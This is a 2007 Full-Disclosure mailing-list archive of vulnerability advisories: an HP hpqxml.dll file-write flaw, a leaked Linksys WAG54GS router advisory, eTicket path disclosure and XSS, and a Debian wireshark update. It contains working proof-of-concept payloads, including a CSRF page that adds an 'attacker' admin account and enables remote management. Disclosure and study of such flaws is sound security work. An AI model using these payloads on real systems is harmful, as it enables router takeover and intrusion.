 ================================================================
 
 Internal ID: VULWAR200706275.
 
 Introduction
 
 hpqxml.dll is a library included in the HP Photo Digital Imaging
 software package from the HP Company. http://www.hp.com.
 Link:
 http://www.hp.com/united-states/consumer/digital_photography/home_f.html
 
 
 Tested In
 
 - Windows XP SP2 english/french with IE 6.0 / 7.0.
 - Windows vista Professional English/French SP1 with IE 7.0
 
 
 Summary
 
 The saveXMLAsFile method doesn't check if it is being called from the
 application or from a malicious user.
 
 
 Impact
 
 The vulnerability is due to an error in the saveXMLAsFile method, which
 manipulates local files insecurely and could allow malicious users to
 write arbitrary data to any file on a vulnerable system. Besides, the
 method does not check the file headers before writing.
 
 
 Workaround
 
 - Activate the Kill bit zero in
 clsid:9C0A0321-B328-466C-8ECA-B9A5522466D3.
 - Unregister hpqxml.dll using regsvr32.
 
 
 Timeline
 
 June 27, 2007 -- Bug discovery.
 June 27, 2007 -- Bug published.
 
 
 Credits
 
  * Brian Mariani [EMAIL PROTECTED]
  * GoodFellas Security Research Team goodfellas.shellcode.com.ar
 
 
 Technical Detail
 
 saveXMLAsFile method receives a filename as an argument, with this format
 c:\path\file.
 
 
 Proof of Concept
 
<html>
<head>
<title>Hpqxml.dll 2.0.0.133 HP Digital Imaging Arbitrary Data Write</title>
</head>
<body>
<h3>Hpqxml.dll 2.0.0.133 HP Digital Imaging Arbitrary Data Write</h3><br>

<object classid='clsid:9C0A0321-B328-466C-8ECA-B9A5522466D3' id='target'>
</object>

<input language="VBScript" onclick="HP()" type="button" value="Proof of Concept">

<script language='vbscript'>

Sub HP()

  filename = "C:\NTDETECT_.COM"

  target.saveXMLAsFile filename

End Sub

</script>
</body>
</html>
 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Month of Random Hashes: DAY FOURTEEN

2007-06-27 Thread Dr. Neal Krawetz PhD
Send it over here.  The picture, not the hash.  I have the technologies
to determine whether the image is computer generated, digitally altered,
or legitimately a real picture!

These technologies shall be unveiled at Blackhat during my presentation.
Sometimes it is difficult to determine which asses are real in this
facade that is the computer security world.

- doc neal
http://www.hackerfactor.com/blog/

ps: if time provides during my speech, I will discuss the many
difficulties I have experienced as a computer security consultant while
attempting to have fake myspace accounts shut down for my clients!

On Wed, Jun 27, 2007 at 01:48:45PM -0400, Jared DeMott wrote:
 Month of Random Hashes wrote:
  [ITEM #1]  == my hinney
  sha1: a25d7360e1294a6a6242ed4621d5d73347ea6398
 Took a picture of my backend and would like to post the hash.
 



[Full-disclosure] Persistent XSS and CSRF and on network appliance

2007-06-27 Thread pagvac
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
The HTTP interface of a network appliance has been researched and
found to be vulnerable to several persistent XSS and CSRF.

Such research was done by pdp (architect) and myself. We informed the
vendor and will publish the details when a fix is available.

The following is the MD5 hash for the advisory file.

$ md5sum.exe research.txt
3db1d71fc3a0eae119617b3b1124206f  *research.txt

Regards,

- --
pagvac
[http://gnucitizen.org, http://ikwt.com/]

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (MingW32)
 
iD8DBQFGgsGdjXB4hX6OC/cRAnwiAKCVI2JC4JNMvWXa3U/4b7WlH4FIfwCg1bL9
4ch1PaYvt6TSWtKVJX2cfgs=
=Ls8N
-END PGP SIGNATURE-



[Full-disclosure] Persistent XSS and CSRF on network appliance [subject corrected :) ]

2007-06-27 Thread pagvac
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

The HTTP interface of a network appliance has been researched and
found to be vulnerable to several persistent XSS and CSRF.

Such research was done by pdp (architect) and myself. We informed the
vendor and will publish the details when a fix is available.

The following is the MD5 hash for the advisory file.

$ md5sum.exe research.txt
3db1d71fc3a0eae119617b3b1124206f  *research.txt

Regards,

- --
pagvac
[http://gnucitizen.org, http://ikwt.com/]

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (MingW32)

iD8DBQFGgsJGjXB4hX6OC/cRAlVFAJwLfy2ByAZz0cgjx4+/H7NaWMpwXQCff/T9
x6VqTYC1FTecOaPnRjEqm08=
=GgsZ
-END PGP SIGNATURE-
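The post above publishes only an MD5 digest of research.txt and promises the file later, i.e. a hash commitment. The following is an added example, not code from the thread: it parses the md5sum line exactly as posted, shows the bare-MD5 scheme, and beside it a commitment built on SHA-256 with a nonce, which is what makes the commitment both binding (MD5 collisions were already practical in 2007, so a committer who controls the whole file could prepare two files with one digest) and hiding (a short document cannot be confirmed by hashing guesses). The document text and nonce in the demo are constructed; the real research.txt is not available.

```python
"""Verifying a hash commitment like the one in the post above.

Added example, not code from the thread. The document text and nonce below are
constructed; the real research.txt is not available, only its published MD5.
"""
import hashlib
import hmac
import secrets

# The digest line exactly as md5sum printed it in the post ('*' = binary mode).
PUBLISHED_MD5_LINE = "3db1d71fc3a0eae119617b3b1124206f  *research.txt"


def parse_md5sum_line(line):
    """Split one line of md5sum output into (hex_digest, filename)."""
    digest, sep, name = line.strip().partition("  ")
    if not sep or len(digest) != 32 or set(digest.lower()) - set("0123456789abcdef"):
        raise ValueError("not an md5sum line: %r" % line)
    if name.startswith("*"):          # binary-mode marker, not part of the name
        name = name[1:]
    return digest.lower(), name


def bare_md5(document):
    """The scheme used in the post: md5sum of the file, nothing else.

    MD5 collisions were practical in 2007, so a committer who controls the
    whole file can prepare two different files with this same digest; the
    commitment is then not binding."""
    return hashlib.md5(document).hexdigest()


def commit(document, nonce, algorithm="sha256"):
    """Binding and hiding commitment: H(nonce || document) with a
    collision-resistant hash. The nonce stops anyone from confirming a guess
    of a short document by hashing candidates."""
    h = hashlib.new(algorithm)
    h.update(nonce)
    h.update(document)
    return h.hexdigest()


def open_commitment(document, nonce, published_digest, algorithm="sha256"):
    """Recompute the digest from the revealed document and nonce and compare in
    constant time. True only if both match what was published."""
    return hmac.compare_digest(commit(document, nonce, algorithm), published_digest)


if __name__ == "__main__":
    # Constructed stand-in for the unreleased advisory text.
    document = b"Persistent XSS and CSRF on network appliance\n(details withheld until fix)\n"
    nonce = secrets.token_bytes(16)
    digest = commit(document, nonce)
    print("publish now:", digest)
    print("reveal later: document + nonce ->", open_commitment(document, nonce, digest))
    print("tampered reveal ->", open_commitment(document + b"!", nonce, digest))
```

To use this the way the post intends, publish `commit(document, nonce)` up front and release both the document and the nonce once the vendor has shipped a fix; readers then call `open_commitment` rather than eyeballing md5sum output.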



Re: [Full-disclosure] Month of Random Hashes: DAY FOURTEEN

2007-06-27 Thread Jared DeMott
Dr. Neal Krawetz PhD wrote:
 Send it over here.  The picture, not the hash.  I have the technologies
 to determine whether the image is computer generated, digitally altered,
 or legitimately a real picture!

 These technologies shall be unveiled at Blackhat during my presentation.
 Sometimes it is difficult to determine which asses are real in this
 facade that is the computer security world.

 - doc neal
 http://www.hackerfactor.com/blog/

 ps: if time provides during my speech, I will discuss the many
 difficulties I have experienced as a computer security consultant while
 attempting to have fake myspace accounts shut down for my clients!

   
hahahahahahha.  believe me, no one really wants to see it!



Re: [Full-disclosure] Persistent XSS and CSRF on network appliance [subject corrected :) ]

2007-06-27 Thread Joey Mengele
Please provide the original content of research.txt so I can verify 
that the hash is correct. I will also need the hash of your 
md5sum.exe. Thanks.

J

On Wed, 27 Jun 2007 16:02:16 -0400 pagvac 
[EMAIL PROTECTED] wrote:
The HTTP interface of a network appliance has been researched and
found to be vulnerable to several persistent XSS and CSRF.

Such research was done by pdp (architect) and myself. We informed 
the
vendor and will publish the details when a fix is available.

The following is the MD5 hash for the advisory file.

$ md5sum.exe research.txt
3db1d71fc3a0eae119617b3b1124206f  *research.txt

Regards,

--
pagvac
[http://gnucitizen.org, http://ikwt.com/]




Re: [Full-disclosure] Persistent XSS and CSRF on network appliance [subject corrected :) ]

2007-06-27 Thread Joey Mengele
Due to your extreme uncooperativeness, I will be attempting to
brute force the contents of this advisory in the meantime. Thank
you.

J

On Wed, 27 Jun 2007 16:29:43 -0400 pagvac 
[EMAIL PROTECTED] wrote:
The file research.txt will be provided once the vendor fixes the
issues. At that point anyone can check that the hash matches the 
one
included in this post.

Thank you.

Joey Mengele wrote:
 Please provide the original content of research.txt so I can 
verify
 that the hash is correct. I will also need the hash of your
 md5sum.exe. Thanks.

 J

 On Wed, 27 Jun 2007 16:02:16 -0400 pagvac
 [EMAIL PROTECTED] wrote:
 The HTTP interface of a network appliance has been researched 
and
 found to be vulnerable to several persistent XSS and CSRF.

 Such research was done by pdp (architect) and myself. We 
informed
 the
 vendor and will publish the details when a fix is available.

 The following is the MD5 hash for the advisory file.

 $ md5sum.exe research.txt
 3db1d71fc3a0eae119617b3b1124206f  *research.txt

 Regards,

 --
 pagvac
 [http://gnucitizen.org, http://ikwt.com/]





--
pagvac
[http://gnucitizen.org, http://ikwt.com/]




[Full-disclosure] [SECURITY] [DSA 1322-1] New wireshark packages fix denial of service

2007-06-27 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1322-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
June 27th, 2007 http://www.debian.org/security/faq
- --

Package: wireshark
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2007-3390 CVE-2007-3392 CVE-2007-3393

Several remote vulnerabilities have been discovered in the Wireshark
network traffic analyzer, which may lead to denial of service. The Common
Vulnerabilities and Exposures project identifies the following problems:

CVE-2007-3390

Off-by-one overflows were discovered in the iSeries dissector.

CVE-2007-3392

The MMS and SSL dissectors could be forced into an infinite loop.

CVE-2007-3393

An off-by-one overflow was discovered in the DHCP/BOOTP dissector.

The oldstable distribution (sarge) is not affected by these problems.
(In Sarge Wireshark used to be called Ethereal).

For the stable distribution (etch) these problems have been fixed
in version 0.99.4-5.etch.0. Packages for the big endian MIPS architecture
are not yet available. They will be provided later.

For the unstable distribution (sid) these problems have been fixed in
version 0.99.6pre1-1.

We recommend that you upgrade your Wireshark packages.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

  Source archives:


http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.0.dsc
  Size/MD5 checksum: 1066 18ea1bc407fe203089596126d9429c64

http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.0.diff.gz
  Size/MD5 checksum:40945 82b8a22a1cc100e5649f278cabbcce4f

http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4.orig.tar.gz
  Size/MD5 checksum: 13306790 2556a31d0d770dd1990bd67b98bd2f9b

  Alpha architecture:


http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.0_alpha.deb
  Size/MD5 checksum:21714 5515a1d74b23c4ed53dafe1b15709263

http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.0_alpha.deb
  Size/MD5 checksum:21998 5d86aaf5e6ee3c8988ebaa9d07a2b05c

http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.0_alpha.deb
  Size/MD5 checksum:21728 b58962a1f2f4797df61c9b465cb3e35c

http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.0_alpha.deb
  Size/MD5 checksum:21722 5b4ee85d1b6f0b14f46604449af500dc

http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.0_alpha.deb
  Size/MD5 checksum:   117204 48df4ca3664055b38c4bfa5c8196dc5a

http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.0_alpha.deb
  Size/MD5 checksum:   674230 0ca5f13b6e7180c0b399a1ca1a3f9a7a

http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.0_alpha.deb
  Size/MD5 checksum:  9319268 fcf022b011151abcf1d7665c7b9a98a4

http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.0_alpha.deb
  Size/MD5 checksum:   181530 d4a0de99d59ecd1a3e818416d31a2d32

  AMD64 architecture:


http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.0_amd64.deb
  Size/MD5 checksum:22304 0cb411bd110cb7be99f0b426e52b68da

http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.0_amd64.deb
  Size/MD5 checksum:22658 f8f1820a2ef75ad8d693be9a235a16bf

http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.0_amd64.deb
  Size/MD5 checksum:22320 f59c3f8f5fd407e89852b9fca9c46796

http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.0_amd64.deb
  Size/MD5 checksum:22316 bb9fc8d3d87f2806cefb9b80e4586c1c

http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.0_amd64.deb
  Size/MD5 checksum:   111908 df3804d4217ae00add067fc51945c364

http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.0_amd64.deb
  Size/MD5 checksum:   618876 de929e23361608de180194014ba3dfb3


Re: [Full-disclosure] Persistent XSS and CSRF on network appliance [subject corrected :) ]

2007-06-27 Thread Joey Mengele
After plugging this hash into John The Ripper, I was able to 
reproduce the text of the original advisory. It follows in 
entirety. For those wishing to verify the hash provided by the 
architect, I have also included the advisory in attachment form as 
a convenience for the skeptics who say MD5 can not be reversed.

J

___ BEGIN LAME CRACKED ADVISORY ___
Persistent XSS and CSRF on Wireless-G ADSL Gateway with 
SpeedBooster (WAG54GS)

== Date found ==

24 June 2007

== Firmware Version ==

V1.00.06

== Description ==


There are several persistent XSS vulnerabilities on the 
'/setup.cgi' script.

It is possible to inject JavaScript by assigning a payload like the 
following
to any of the vulnerable parameters:

<script>[PAYLOAD]</script>

The vulnerable (non-sanitized) parameters are the following:

'devname'
'snmp_getcomm'
'snmp_setcomm'
'c4_trap_ip_'

Additionally, none of the HTTP requests are tokenized using 
non-predictable values. Thus, all requests to the router's HTTP 
interface are vulnerable to Cross-site Request Forgery (CSRF), 
perhaps by design.

The following is an example of an HTTP request (notice the lack of 
non-predictable tokens):

POST /setup.cgi HTTP/1.1
Authorization: Basic YWRtaW46YWRtaW4=

mtenRestore=Restore+Factory+Defaults&todo=defaultsettings&this_file=Factorydefaults.htm&next_file=index.htm&message=

Although the original request is a POST, we can convert it to a 
GET, so that all posted parameters can be submitted on a single URL.

For example, the previous POST request can be converted to a URL 
such as the following:

http://admin:[EMAIL PROTECTED]/setup.cgi?mtenRestore=Restore+Factory+Defaults&todo=defaultsettings&this_file=Factorydefaults.htm&next_file=index.htm&message=

By forging administrative requests (Administration button on the 
router's HTML menu), an attacker can compromise the router provided 
the
victim user visits a malicious URL or HTML page.

The attack can only be successful if any of the following 
conditions are met:

- the administrator hasn't changed the default credentials 
(admin/admin)
- the administrator's browser has an active authentication session 
with the router's interface when the attack happens
  (highly unlikely)


== Persistent XSS PoC ==

The following URL creates a DoS condition by making the 
Administration page inaccessible, since 'history.back()' 
will run every time the Administration page is visited. Thus the 
administrator won't be able to ever change the 
default credentials unless a hard reset is performed using the 
router's physical restart switch:

http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=1&sysname=admin&sysPasswd=admin&sysConfirmPasswd=admin&remote_management=enable&http_wanport=8080&devname=&snmp_enable=disable&upnp_enable=enable&wlan_enable=enable&save=Save+Settings&h_user_list=1&h_pwset=yes&pwchanged=yes&h_remote_management=enable&c4_trap_ip_=<script>history.back()</script>&h_snmp_enable=enable&h_upnp_enable=enable&h_wlan_enable=enable&todo=save&this_file=Administration.htm&next_file=Administration.htm&message=
http://tinyurl.com/36sjzw


== CSRF PoC ==

The following HTML page does the following:

- adds an *additional* administrative account, with a username 
equal to 'attacker' and a password equal to '0wned' (without 
removing the original admin account!)
- enables remote HTTP management over port 1337
- sets other settings that are irrelevant to this discussion

<html>
<body>
<script>
// send 2 requests to add an administrative account and enable remote management
// tries with default credentials and with credentials cached by browser (if any)

var img = new Image();
var img2 = new Image();

img.src = 'http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=8&sysname=attacker&sysPasswd=0wned&sysConfirmPasswd=0wned&remote_management=enable&http_wanport=1337&devname=&snmp_enable=disable&upnp_enable=enable&wlan_enable=enable&save=Save+Settings&h_user_list=8&h_pwset=yes&pwchanged=yes&h_remote_management=enable&c4_trap_ip_=&h_snmp_enable=disable&h_upnp_enable=enable&h_wlan_enable=enable&todo=save&this_file=Administration.htm&next_file=Administration.htm&message=';
img2.src = 'http://192.168.1.1/setup.cgi?user_list=8&sysname=attacker&sysPasswd=0wned&sysConfirmPasswd=0wned&remote_management=enable&http_wanport=1337&devname=&snmp_enable=disable&upnp_enable=enable&wlan_enable=enable&save=Save+Settings&h_user_list=8&h_pwset=yes&pwchanged=yes&h_remote_management=enable&c4_trap_ip_=&h_snmp_enable=disable&h_upnp_enable=enable&h_wlan_enable=enable&todo=save&this_file=Administration.htm&next_file=Administration.htm&message=';
</script>
</body>
</html>

The first URL forges the administrative request using the default 
credentials, so it won't work if default credentials
have been changed.

The second URL doesn't specify any credentials as an attempt to use 
the browser's 

[Full-disclosure] eTicket version 1.5.5 Path Disclosure Vulnerability

2007-06-27 Thread SecurityResearch
netVigilance Security Advisory #30
eTicket version 1.5.5 Path Disclosure Vulnerability
Description:
eTicket is an electronic (open source) support ticket system based on osTicket, 
that can receive tickets via email (pop3 or pipe) and a web-based form, as
well as manage them using a web interface.
External References: 
Mitre CVE:  CVE-2007-2800
NVD NIST: CVE-2007-2800
OSVDB: 34785
Summary: 
eTicket is an electronic (open source) support ticket system based on osTicket.
A security problem in the product allows attackers to gather the true path of 
the server-side script. 
Advisory URL: 
http://www.netvigilance.com/advisory0030
Release Date:
06/27/2007
Severity:
Risk: Low
 
CVSS Metrics:
Access Vector: Remote
Access Complexity: Low
Authentication: Not-required
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None 
Impact Bias: Normal
CVSS Base Score: 2.3
 
Target Distribution on Internet: Low
 
Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Confirmed
 
Vulnerability Impact: Attack
Host Impact: Path disclosure
SecureScout Testcase ID:
TC 17960
 
Vulnerable Systems:
eTicket version 1.5.5 (new version 1.5.5.1 is also vulnerable)
Vulnerability Type:
Program flaws - The product scripts have flaws which lead to Warnings.
Vendor:
HM2K
Vendor Status: 
HM 2K from eTicket got the Draft advisory on 21 May 2007 and got extensive 
support in how to fix the security problems on 23 May 2007 and 28 May 2007.
In HM 2K's own words: "HM 2K lost interest and HM 2K seriously found it too 
difficult to orchestrate what you [netVigilance] were asking from me [HM 2K],
so I just did what I thought was best." netVigilance's tests show that version 
1.5.5.1 is also vulnerable. There currently is no official fix for this
advisory.
 
Workaround:
Disable warning messages: set the following line in the php.ini file: 
display_errors = Off.
 
Example: 
REQUEST:
http://[TARGET]/[PRODUCT FOLDER]/index.php?name[]=1
OR
http://[TARGET]/[PRODUCT FOLDER]/index.php?email[]=1
OR
http://[TARGET]/[PRODUCT FOLDER]/index.php?phone[]=1
OR
http://[TARGET]/[PRODUCT FOLDER]/index.php?subject[]=1
OR (available for version 1.5.5 and also for new version 1.5.5.1)
Create a file (example.html) with the following content:

<html>
<body onLoad="document.forms(0).submit();">
<form action="http://[TARGET]/[PRODUCT FOLDER]/index.php" method="POST">
<input type="hidden" name="name[]" value="1">
<input type="hidden" name="email[]" value="1">
<input type="hidden" name="phone[]" value="1">
<input type="hidden" name="subject[]" value="1">
</form>
</body>
</html>

Then load it in any web browser.
REPLY:
<b>Warning</b>:  htmlspecialchars() expects parameter 1 to be string, array 
given in <b>[DISCLOSED PATH][PRODUCT FOLDER]\inc\open_form.php</b> on line
<b>[18 OR 26 OR 31 OR 51 OR 55]</b><br />
Credits: 
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.c



[Full-disclosure] eTicket version 1.5.5 XSS Attack Vulnerability

2007-06-27 Thread SecurityResearch
netVigilance Security Advisory #31
eTicket version 1.5.5 XSS Attack Vulnerability 
Description:
eTicket is an electronic (open source) support ticket system based on osTicket, 
that can receive tickets via email (pop3 or pipe) and a web-based form, as
well as manage them using a web interface.
Successful exploitation requires PHP register_globals set to On.
External References: 
Mitre CVE:  CVE-2007-2801
NVD NIST: CVE-2007-2801
OSVDB: 34786
Summary: 
eTicket is an electronic (open source) support ticket system based on osTicket.
Security problem in the product allows attackers to conduct XSS attacks.
Advisory URL: 
http://www.netvigilance.com/advisory0031
Release Date:
06/27/2007
 
Severity:
Risk: Medium
 
CVSS Metrics:
Access Vector: Remote
Access Complexity: High
Authentication: Not-required
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: Partial 
Impact Bias: Normal
CVSS Base Score: 5.6
 
Target Distribution on Internet: Low
 
Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Confirmed
 
Vulnerability Impact: Attack
Host Impact: XSS Attack
SecureScout Testcase ID:
TC 17961
Vulnerable Systems:
eTicket version 1.5.5 (new version 1.5.5.1 is also vulnerable)
Vulnerability Type:
XSS (Cross-Site Scripting) to force a web-site to display malicious contents to 
the target, by sending a specially crafted request to the web-site. The
vulnerable web-site is not the target of attack but is used as a tool for the 
hacker in the attack of the victim.
Vendor:
HM2K
Vendor Status: 
HM 2K from eTicket got the Draft advisory on 21 May 2007 and got extensive 
support in how to fix the security problems on 23 May 2007 and 28 May 2007.
In HM 2K's own words: "HM 2K lost interest and HM 2K seriously found it too 
difficult to orchestrate what you [netVigilance] were asking from me [HM 2K],
so I just did what I thought was best." netVigilance's tests show that version 
1.5.5.1 is also vulnerable. There currently is no official fix for this
advisory.
Workaround:
In the php.ini file set register_globals = Off. 
Example: 
REQUEST:
http://[TARGET]/[PRODUCT FOLDER]/open.php?err=<script>alert(document.cookie)</script>
OR
http://[TARGET]/[PRODUCT FOLDER]/open.php?warn=<script>alert(document.cookie)</script>
REPLY:
Will execute <script>alert(document.cookie)</script>
Credits: 
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.c
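The two netVigilance advisories above describe one root cause seen twice: request fields are handed to output functions without first checking their shape (an array where a string is expected trips a PHP warning that prints the script path) or escaping their content (`err`/`warn` echoed verbatim, reachable through register_globals). The following is an added example, written in Python rather than eTicket's PHP and not the project's code, of an open-form handler that enforces a single string per field, answers malformed input with a generic 400 that carries no path or line number, and escapes `err`/`warn` before output. The request strings and field names in the demo are constructed from the advisories' parameter names.

```python
"""Input handling that closes both eTicket findings above (array-valued form
fields tripping a path-disclosing warning, and unescaped err/warn messages).
Added example in Python; eTicket itself is PHP and this is not its code.
Requests below are constructed.
"""
import html
from urllib.parse import parse_qs

FORM_FIELDS = ("name", "email", "phone", "subject")   # open form inputs
MESSAGE_FIELDS = ("err", "warn")                      # status text shown on open.php


class BadRequest(Exception):
    """Client error; the reply never includes file paths or line numbers."""


def scalar(params, name, maxlen=256):
    """Return exactly one string for a field.

    PHP turns 'name[]=1' into an array and htmlspecialchars() then emits the
    warning quoted in the advisory, including the script's path. Checking the
    shape first means bad input is answered with a generic 400 instead."""
    if any(k.startswith(name + "[") for k in params):
        raise BadRequest("field %s must be a single string, not an array" % name)
    values = params.get(name, [""])
    if len(values) != 1:
        raise BadRequest("field %s supplied %d times" % (name, len(values)))
    return values[0][:maxlen]


def render_open_form(query):
    """Return (http_status, html_body) for a request to the open form."""
    params = parse_qs(query, keep_blank_values=True)
    try:
        fields = {f: html.escape(scalar(params, f), quote=True) for f in FORM_FIELDS}
        notes = {f: html.escape(scalar(params, f), quote=True) for f in MESSAGE_FIELDS}
    except BadRequest as exc:
        # Generic message: display_errors=Off in php.ini is the advisory's
        # workaround; this is the application-level equivalent.
        return 400, "<p>Bad request: %s</p>" % html.escape(str(exc))
    body = "".join('<input type="text" name="%s" value="%s">\n' % (f, v)
                   for f, v in fields.items())
    # err/warn are read from the parsed request only, never from a global that
    # register_globals could have populated, and are escaped before output.
    for f in MESSAGE_FIELDS:
        if notes[f]:
            body += '<p class="%s">%s</p>\n' % (f, notes[f])
    return 200, body


if __name__ == "__main__":
    for q in ("name[]=1&email=a@example.invalid",
              "err=<script>alert(document.cookie)</script>",
              "name=Bob&subject=Printer"):
        status, body = render_open_form(q)
        print(status, body)
```

Turning `display_errors` off, as the advisory recommends, hides the leak but leaves the type confusion in place; rejecting the malformed field is what removes it, and escaping at output is what closes the XSS regardless of the register_globals setting.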



Re: [Full-disclosure] Month of Random Hashes: DAY FOURTEEN

2007-06-27 Thread James Matthews

Ha ;) The question is are they really hashes?

On 6/27/07, Jared DeMott [EMAIL PROTECTED] wrote:


Dr. Neal Krawetz PhD wrote:
 Send it over here.  The picture, not the hash.  I have the technologies
 to determine whether the image is computer generated, digitally altered,
 or legitimately a real picture!

 These technologies shall be unveiled at Blackhat during my presentation.
 Sometimes it is difficult to determine which asses are real in this
 facade that is the computer security world.

 - doc neal
 http://www.hackerfactor.com/blog/

 ps: if time provides during my speech, I will discuss the many
 difficulties I have experienced as a computer security consultant while
 attempting to have fake myspace accounts shut down for my clients!


hahahahahahha.  believe me, no one really wants to see it!






--
http://www.goldwatches.com/watches.asp?Brand=14

Re: [Full-disclosure] Persistent XSS and CSRF on network appliance [subject corrected :) ]

2007-06-27 Thread pagvac
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
Nice look up to http://unknown.pentester.googlepages.com/sitemap.xml

If you bothered that much you deserve the advisory I guess :-D.

btw, I didn't know google pages have sitemap.xml enabled by default.

So no hash cracking here, just to set things straight.

Joey Mengele wrote:
 After plugging this hash into John The Ripper, I was able to
 reproduce the text of the original advisory. It follows in
 entirety. For those wishing to verify the hash provided by the
 architect, I have also included the advisory in attachment form as
 a convenience for the skeptics who say MD5 can not be reversed.

 J

 ___ BEGIN LAME CRACKED ADVISORY ___
 Persistent XSS and CSRF and on Wireless-G ADSL Gateway with
 SpeedBooster (WAG54GS)

 == Date found ==

 24 June 2007

 == Firmware Version ==

 V1.00.06

 == Description ==


 There are several persistent XSS vulnerabilities on the
 '/setup.cgi' script.

 It is possible to inject JavaScript by assigning a payload like the
 following
 to any of the vulnerable parameters:

 script[PAYLOAD]/script

 The vulnerable (non-sanitized) parameters are the following:

 'devname'
 'snmp_getcomm'
 'snmp_setcomm'
 'c4_trap_ip_'

 Additionally, all HTTP requests are not tokenized using non-
 predictable values.
 Thus, all requests to the router's HTTP interface are vulnerable to
 Cross-site
 Request Forgeries (CSRF), perhaps by design.

 The following is an example of a HTTP request (notice the lack of
 non-predictable tokens):

 POST /setup.cgi HTTP/1.1
 Authorization: Basic YWRtaW46YWRtaW4=

 mtenRestore=Restore+Factory+Defaultstodo=defaultsettingsthis_file
 =Factorydefaults.htmnext_file=index.htmmessage=

 Although the original request is a POST, we can convert it to a
 GET, so that all posted parameters can be submitted on a single URL.

 For example, the previous POST request can be converted to a URL
 such as the following:

 http://admin:[EMAIL PROTECTED]/setup.cgi?mtenRestore=Restore+Factor
 y+Defaultstodo=defaultsettingsthis_file=Factorydefaults.htmnext_f
 ile=index.htmmessage=

 By forging administrative requests (Administration button on the
 router's HTML menu), an attacker can compromise the router provided
 the
 victim user visits a malicious URL or HTML page.

 The attack can only be successfuly if any of the following
 conditions are met:

 - the administrator hasn't changed the default credentials
 (admin/admin)
 - the administrator's browser has an active authentication session
 with the router's interface when the attack happens
   (highly unlikely)


 == Persistent XSS PoC ==

 The following URL creates a DoS condition by making the
 Administration page inaccessible since 'history.back()'
 will run everytime the Administration page is visited. Thus the
 administrator won't be able to ever change the
 default credentials unless a hard reset is performed on using the
 router's physical restart switch:

 http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=1sysname=admin
 sysPasswd=adminsysConfirmPasswd=adminremote_management=enablehttp
 _wanport=8080devname=snmp_enable=disableupnp_enable=enablewlan_e
 nable=enablesave=Save+Settingsh_user_list=1h_pwset=yespwchanged=
 yesh_remote_management=enablec4_trap_ip_=scripthistory.back()
 /scripth_snmp_enable=enableh_upnp_enable=enableh_wlan_enable=ena
 bletodo=savethis_file=Administration.htmnext_file=Administration.
 htmmessage=
 http://tinyurl.com/36sjzw


 == CSRF PoC ==

 The following HTML page does the following:

 - adds an *additional* administrative account, with a username
 equals to 'attacker' and a password equals to '0wned' (without
 removing original admin account!)
 - enables remote HTTP management over port 1337
 - sets other settings that are inrelevant to this discussion

 html
 body
 script
 // send 2 requests to add an administrative account and enable
 remote management
 // tries with default credentials and with credentials cached by
 browser (if any)

 var img = new Image();
 var img2 = new Image();

 img.src =
 'http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=8sysname=attack
 ersysPasswd=0wnedsysConfirmPasswd=0wnedremote_management=enableh
 ttp_wanport=1337devname=snmp_enable=disableupnp_enable=enablewla
 n_enable=enablesave=Save+Settingsh_user_list=8h_pwset=yespwchang
 ed=yesh_remote_management=enablec4_trap_ip_=h_snmp_enable=disable
 h_upnp_enable=enableh_wlan_enable=enabletodo=savethis_file=Admin
 istration.htmnext_file=Administration.htmmessage=';
 img2.src =
 'http://192.168.1.1/setup.cgi?user_list=8sysname=attackersysPasswd
 =0wnedsysConfirmPasswd=0wnedremote_management=enablehttp_wanport=
 1337devname=snmp_enable=disableupnp_enable=enablewlan_enable=ena
 blesave=Save+Settingsh_user_list=8h_pwset=yespwchanged=yesh_rem
 ote_management=enablec4_trap_ip_=h_snmp_enable=disableh_upnp_enab
 le=enableh_wlan_enable=enabletodo=savethis_file=Administration.ht
 


